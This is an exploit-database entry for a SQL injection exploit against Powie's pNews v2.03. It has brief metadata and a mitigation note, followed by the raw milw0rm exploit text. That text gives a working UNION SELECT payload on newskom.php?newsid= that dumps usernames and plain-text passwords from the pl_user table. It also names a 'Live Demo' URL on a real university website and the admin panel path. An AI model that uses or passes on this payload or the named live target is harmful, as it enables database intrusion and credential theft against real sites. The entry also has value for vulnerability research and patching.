Powie's pNews v2.03 (newskom.php?newsid=) Remote SQL Injection Exploit

vendor:

pNews

by:

r45c4l

8.5

CVSS

HIGH

SQL Injection

CWE

Product Name: pNews

Affected Version From: 02.03

Affected Version To: 02.03

Patch Exists: N/A

Related CWE: N/A

CPE: a:powie:pnews

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2007

Powie’s pNews v2.03 (newskom.php?newsid=) Remote SQL Injection Exploit

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary SQL commands in the back-end database, allowing them to access or modify critical application data, or even gain access to the underlying server.

Mitigation:

The best way to mitigate SQL injection attacks is to use parameterized queries (also known as prepared statements). This approach ensures that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker.

Source

Exploit-DB raw data:

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                #
#                   and all darkc0de members                ---# 
################################################################ 
# 
# Author: r45c4l 
# 
# Home  : www.darkc0de.com 
# 
# Email : r45c4l@hotmail.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# Title: Powie's pNews v2.03 (newskom.php?newsid=) Remote SQL Injection Exploit

#
# Vendor:  http://www.powie.de

# 
#
###########################################################
#
# d0rk:n/a
#
###########################################################
 
     Exploit:-
	http://www.site.com/[script]/newskom.php?newsid=-1+union+all+select+1,2,3,4,concat(username,0x3a,pwd,0x3a),6+from+pl_user/*

     
     
     Live Demo: 
	http://www.uni-leipzig.de/fsrpowi/newskom.php?newsid=-1+union+all+select+1,2,3,4,concat(username,0x3a,pwd,0x3a),6+from+pl_user/*

     Admin panel is at http://site.com/script/admin/ 

     The password in in plain text :P	

###########################################################
#
#  Bug discovered : 12 Sep.2008
###########################################################

# milw0rm.com [2008-09-12]